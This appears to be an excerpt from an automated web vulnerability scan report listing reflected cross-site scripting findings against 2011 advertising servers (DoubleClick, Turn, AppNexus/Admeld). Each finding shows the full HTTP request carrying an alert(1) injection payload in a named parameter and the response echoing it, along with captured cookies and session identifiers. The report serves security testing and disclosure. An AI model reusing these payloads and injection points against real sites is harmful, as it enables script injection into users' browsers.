GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT6a68d"-alert(1)-"b83921a49ea&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:26:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT6a68d"-alert(1)-"b83921a49ea&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyN
...[SNIP]...

7.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e083d"-alert(1)-"fd19c0fdbf9 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088e083d"-alert(1)-"fd19c0fdbf9&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:28:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088e083d"-alert(1)-"fd19c0fdbf9&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSp
...[SNIP]...

7.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f777b"-alert(1)-"69d52534c85 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1f777b"-alert(1)-"69d52534c85&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:27:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1f777b"-alert(1)-"69d52534c85&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0
...[SNIP]...

7.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37f3"-alert(1)-"174e9b66d51 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fgf37f3"-alert(1)-"174e9b66d51&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:27:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fgf37f3"-alert(1)-"174e9b66d51&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwy
...[SNIP]...

7.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a167"-alert(1)-"e2b4b064d7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l2a167"-alert(1)-"e2b4b064d7c&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:26:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/click%3Bh%3Dv8/3afb/f/2e6/%2a/b%3B239944784%3B0-0%3B0%3B62578498%3B2321-160/600%3B41336049/41353836/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l2a167"-alert(1)-"e2b4b064d7c&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5o
...[SNIP]...

7.7. http://ad.doubleclick.net/adj/wpni.jobs/front [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de551'%3balert(1)//17b4bcec7f4 was submitted in the sz parameter. This input was echoed as de551';alert(1)//17b4bcec7f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/wpni.jobs/front;sz=de551'%3balert(1)//17b4bcec7f4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 355
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 01 May 2011 23:34:06 GMT
Expires: Sun, 01 May 2011 23:39:06 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3afa/0/0/%2a/d;240396230;0-0;0;5742660;255-0/0;41867457/41885244/1;;~okv=;sz=de551';alert(1)//17b4bcec7f4;~aopt=2/1/ff/1;~sscs=%3fhttp://www.esri.com/washpostrecruit">
...[SNIP]...

7.8. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6123"><script>alert(1)</script>730c7e9bf00 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=b6123"><script>alert(1)</script>730c7e9bf00 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:20:17 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:20:16 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=9099190985727552127&fpid=b6123"><script>alert(1)</script>730c7e9bf00&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

7.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dffab'-alert(1)-'addbfb1145 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193dffab'-alert(1)-'addbfb1145&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:12:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:12:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:12:10 GMT
Content-Length: 182

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193dffab'-alert(1)-'addbfb1145&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

7.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed4bf'-alert(1)-'94e964e747d was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

